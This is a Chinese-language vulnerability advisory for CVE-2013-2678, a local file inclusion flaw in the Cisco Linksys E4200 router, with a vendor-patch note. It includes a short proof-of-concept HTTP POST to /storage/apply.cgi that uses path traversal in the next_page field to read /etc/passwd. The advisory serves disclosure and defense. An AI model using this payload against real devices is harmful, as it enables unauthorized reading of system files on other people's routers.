发布日期：2013-05-06
更新日期：2013-05-08

受影响系统：

Cisco Linksys E4200 Router

描述：

---

BUGTRAQ  ID: 59710
CVE(CAN) ID: CVE-2013-2678

Cisco Linksys E4200是双频段无线路由器。

Cisco Linksys E4200（固件版本1.0.05 build 7）存在本地文件包含漏洞，攻击者可以利用此漏洞查看文件并在受影响设备的上下文中执行本地脚本。

<*来源：sqlhacker
  
  链接：http://www.exploit-db.com/exploits/25292/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

sqlhacker给出了如下测试方法


LFI PoC

=============================================

POST /storage/apply.cgi HTTP/1.1

HOST: my.vunerable.e4500.firmware

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila
_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd

建议：

---

厂商补丁：

Cisco
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cisco.com/go/psirt

浏览次数：4430
严重程度：0（网友投票）